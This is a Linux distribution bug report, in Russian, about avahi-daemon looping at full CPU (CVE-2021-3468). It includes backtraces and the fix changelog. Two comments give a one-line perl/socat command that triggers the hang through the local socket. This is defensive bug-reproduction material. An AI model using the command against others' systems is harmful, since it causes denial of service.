Bug 39357

Summary: Зависает avahi-daemon CVE-2021-3468
Product: Sisyphus Reporter: Vitaly Lipatov <lav>
Component: avahi-daemonAssignee: Sergey Bolshakov <sbolshakov>
Status: CLOSED FIXED QA Contact: qa-sisyphus
Severity: major    
Priority: P4 CC: aen, cas, sbolshakov
Version: unstable   
Hardware: x86_64   
OS: Linux   
See Also: http://bugs.debian.org/984938
Bug Depends on:    
Bug Blocks: 47848    

Description Vitaly Lipatov 2020-12-01 22:17:33 MSK 
avahi-daemon-0.8-alt1.x86_64

Обнаружил зависший (ел 100% CPU десятки часов) avahi-daemon, где-то в районе:

0x00007fdb5bbfd217 in find_next_timeout (s=<optimized out>) at simple-watch.c:429
429	    for (t = s->timeouts; t; t = t->timeouts_next) {
(gdb) bt
#0  0x00007fdb5bbfd217 in find_next_timeout (s=<optimized out>) at simple-watch.c:429
#1  0x00007fdb5bbfd94a in avahi_simple_poll_prepare (s=s@entry=0x1d9ab80, timeout=-1) at simple-watch.c:481
#2  0x00007fdb5bbfdd39 in avahi_simple_poll_iterate (s=0x1d9ab80, timeout=<optimized out>) at simple-watch.c:599
Comment 1 Vitaly Lipatov 2021-04-26 22:08:45 MSK 
Так и крутится:

0x00007fb7db7f121f in find_next_timeout (s=<optimized out>) at simple-watch.c:431
431	        if (t->dead || !t->enabled)
(gdb) bt
#0  0x00007fb7db7f121f in find_next_timeout (s=<optimized out>) at simple-watch.c:431
#1  0x00007fb7db7f1c1e in avahi_simple_poll_dispatch (s=0x1919b30) at simple-watch.c:558
#2  0x0000000000407999 in ?? ()
#3  0x00007fb7db55708b in __libc_start_main (main=0x407130, argc=2, argv=0x7ffe42dbb988, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffe42dbb978) at ../csu/libc-start.c:308
#4  0x000000000040810a in ?? ()
Comment 2 Vitaly Lipatov 2021-04-26 22:14:32 MSK 
Да, это
https://github.com/lathiat/avahi/pull/330
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=984938

Сразу воспроизводится на Сизифе и p9:
$ perl -e '$|=1; print "a"x(20*1024+1); sleep 1;' | socat - /run/avahi-daemon/socket
Comment 3 Repository Robot 2021-04-28 15:00:18 MSK 
avahi-0.8-alt2 -> sisyphus:

 Wed Apr 28 2021 Sergey Bolshakov <sbolshakov@altlinux.ru> 0.8-alt2
 - avoid infinite-loop in avahi-daemon (closes: #39357) (fixes: CVE-2021-3468)
Comment 4 Vitaly Lipatov 2021-06-03 02:23:45 MSK 
Что-то всё равно зависает на p9:

(gdb) bt
#0  0x00007f0fc54f521f in find_next_timeout (s=<optimized out>) at simple-watch.c:431
#1  0x00007f0fc54f594a in avahi_simple_poll_prepare (s=s@entry=0x10c9b30, timeout=-1) at simple-watch.c:481
#2  0x00007f0fc54f5d39 in avahi_simple_poll_iterate (s=0x10c9b30, timeout=<optimized out>) at simple-watch.c:599
#3  0x0000000000407999 in ?? ()

* Ср апр 28 2021 Sergey Bolshakov <sbolshakov@altlinux.ru> 0.8-alt2
- avoid infinite-loop in avahi-daemon (closes: #39357) (fixes: CVE-2021-3468)

Но таким способом уже не воспроизводится:
> Сразу воспроизводится на Сизифе и p9:
> $ perl -e '$|=1; print "a"x(20*1024+1); sleep 1;' | socat -
> /run/avahi-daemon/socket